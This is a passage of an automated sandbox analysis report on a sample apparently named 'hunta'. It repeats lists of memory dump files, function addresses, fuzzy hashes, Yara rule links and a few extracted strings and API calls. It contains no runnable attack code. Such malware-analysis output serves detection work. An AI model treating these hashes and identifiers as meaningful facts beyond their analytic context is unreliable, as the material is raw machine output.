Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID: %s|%s$131$50500$type must be boolean, but is
API String ID: 0-353184664
Opcode ID: c067d13b9938ca753cf71e235fc3e1c8861f1b6b637f0db15ef24b0bb36dcb3c
Instruction ID: f0e9264e2ad035a4864c3b6afa957d35b17fcf6a172d270f3a905aa57fe3f63c
Opcode Fuzzy Hash: c067d13b9938ca753cf71e235fc3e1c8861f1b6b637f0db15ef24b0bb36dcb3c
Instruction Fuzzy Hash: 3123DC709002588FDF28DF68C958BEEBBB0AF05304F1891D9D449BB292DB759E85CF91

Function 00EF0380 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

type must be number, but is , xrefs: 00EF0541
type must be string, but is , xrefs: 00EF03E4
/Kim, xrefs: 00EF05A9
/Kim, xrefs: 00EF05C2

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
API String ID: 0-1144537432
Opcode ID: b7d70fb336948ba4e615d9523782061ec6cb0e8c0b3ed56cc9f56cc183bad98d
Instruction ID: 43514a11b1b6dd714eaca3d5a8675a5c1760c02d46db51e03fa1ac6bb1471d30
Opcode Fuzzy Hash: b7d70fb336948ba4e615d9523782061ec6cb0e8c0b3ed56cc9f56cc183bad98d
Instruction Fuzzy Hash: 4491E571E0020C9FCB08DF6CD8917A9B7EAEB89314F14816EE919E7392D7759D05CB90

Function 00E942A0 Relevance: 5.2, APIs: 3, Instructions: 671COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00E9489B
__Mtx_unlock.LIBCPMT ref: 00E949A1
__Mtx_unlock.LIBCPMT ref: 00E94A6C

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 7922285f6ae6260304446e77812c016d6911fa2343d5cec5c6dc21da3e4c454e
Instruction ID: e73b732fe720fd9361e089db13160513c94019346a668c939150ec6ae7f2d56b
Opcode Fuzzy Hash: 7922285f6ae6260304446e77812c016d6911fa2343d5cec5c6dc21da3e4c454e
Instruction Fuzzy Hash: 0B3214B1A002099FDF08DF68DC85BEEB7B1EF45314F244258E815B72D2D775AA46CBA0

Function 00E8A720 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

File, xrefs: 00E8A93C

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID: File
API String ID: 0-749574446
Opcode ID: 81affbab9b9a4690a775d914d94c610141a92d791bed09272c478440978998ae
Instruction ID: 10c5ed980d1f15545512f4821f077b83ebba1d57a2fef736003f3f658940a83d
Opcode Fuzzy Hash: 81affbab9b9a4690a775d914d94c610141a92d791bed09272c478440978998ae
Instruction Fuzzy Hash: 01C1E170D043489BEF14DFA4CC45BEEBBB4EF05304F14016AE908BB292E775A944CBA2

Function 00F5C92A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00F5C338,?,?,?,?,00E94A9B,?,00E9F03C), ref: 00F5C943

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: de80456825cee2285c26d91c0002afffba42386c3b3fdd2b15f52093c95289da
Instruction ID: daa2df3b46918270beca487a953af9ecf19c5060c8f196218643700503eab406
Opcode Fuzzy Hash: de80456825cee2285c26d91c0002afffba42386c3b3fdd2b15f52093c95289da
Instruction Fuzzy Hash: 20D01237A46A3C9B8B112B98FC98BADBF9DAA45B7130C8115EE06572108A656C00FBD5

Function 00E82040 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

string too long, xrefs: 00E82040

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 2141394445-2556327735
Opcode ID: e04de53caf5d77beef21610853c35358d76ce74f8e863aa85fe9e458d96f588b
Instruction ID: 28280dc624f04856d868d99cb2643d00d1b1f80eddc5e2f15566230b8e9ea39e
Opcode Fuzzy Hash: e04de53caf5d77beef21610853c35358d76ce74f8e863aa85fe9e458d96f588b
Instruction Fuzzy Hash: E88120759042869FDB01DFA8C4517EEBFF5EF1A300F285298CA887B782C3758545CBA0

Function 00E8AB50 Relevance: 1.1, Instructions: 1084COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020c9c333501c2a2accd6ff461ec757bd2022307db3550eb4591f2b30121e9e5
Instruction ID: dc3115dcdb9b276a20d577766b10b1c699c8127b869ccd7a9e50f9afdda227c6
Opcode Fuzzy Hash: 020c9c333501c2a2accd6ff461ec757bd2022307db3550eb4591f2b30121e9e5
Instruction Fuzzy Hash: C5921331D002488FDF19DBA8C8547EEBBB5EF46314F288299D45DBB292E7305A46CB91

Function 00F04870 Relevance: .7, Instructions: 744COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f599bc2a352dc97002bd5086a88f188b6704939aa52897f9b7f1f5016f490aa
Instruction ID: 33e4cc639edcc8e2162e9e8374df475898803d2b8803d18fe1ae87716d914768
Opcode Fuzzy Hash: 8f599bc2a352dc97002bd5086a88f188b6704939aa52897f9b7f1f5016f490aa
Instruction Fuzzy Hash: B16280B0E002059BDB14CF59C5847AEBBF1BF88314F2481ADD944AB392D775EA46EF90

Function 00F6956F Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e27657e2426f5e288bb23acf8ba92d3076d4ce45e3481c01435f9d402d157b14
Instruction ID: e0797f8a90a8840eb34c93e09edd1913b62cae351ba8a91ff56832266e5fc8ec
Opcode Fuzzy Hash: e27657e2426f5e288bb23acf8ba92d3076d4ce45e3481c01435f9d402d157b14
Instruction Fuzzy Hash: 1CC1FF70D0870ACFCB25CF68C984A7ABBB9EF06320F18461ED45287691C7B2AD45FB50

Function 00E822C0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1c432529ce6ea95998167711e23de13a6958e91690fdabaf7ceabbdf75ff52
Instruction ID: 81db56f7c742b002c94d92d7d4b90698010549490c930ccc3ea6e2984dd5ed19
Opcode Fuzzy Hash: 2a1c432529ce6ea95998167711e23de13a6958e91690fdabaf7ceabbdf75ff52
Instruction Fuzzy Hash: B7712275E001468FDB119F69C8D07EEBBB5EB0A304F54126CD95CA7783C3399906DBA0

Function 00F01590 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9d3dd24c31ee732b7f52dfd0e5f5a312fa7721b909be9fa3ee71b0d5aa590d2
Instruction ID: 874593850480b117479c6f741bd7c0487c5566e36dbcc7c7242cd05dbf93fdc1
Opcode Fuzzy Hash: c9d3dd24c31ee732b7f52dfd0e5f5a312fa7721b909be9fa3ee71b0d5aa590d2
Instruction Fuzzy Hash: 276135316341694FD758CF5EECD043AB351E39A32138A421FEA81CB395C575EA26E7E0

Function 00E94AB0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77845ef3a3e9b1f1188eb4f95351de9247bec117f3bf2e20c84e530f5c992144
Instruction ID: 2aeac7582f8b0026e6de0aeafb7888d1ad08367d0e753a2db93cb849864ad637
Opcode Fuzzy Hash: 77845ef3a3e9b1f1188eb4f95351de9247bec117f3bf2e20c84e530f5c992144
Instruction Fuzzy Hash: D451B1B1E012099FDF08DF68C841BEEBBB4FF48314F108269E915B7380E7759A448BA4

Function 00F63B28 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
Instruction ID: feb218d2a47310952affbbb99fea3b97b65e1f96446f40f59fb07fae47c3d027
Opcode Fuzzy Hash: b904313642ee8bb92eeea3ac85b95f5796e84e1ff494d4087d2543a59d71a9f0
Instruction Fuzzy Hash: 65518172D00219EFDF04CF99C841AEEBBF6FF88314F198059E915AB241D734AA50DB90

Function 00F603A0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
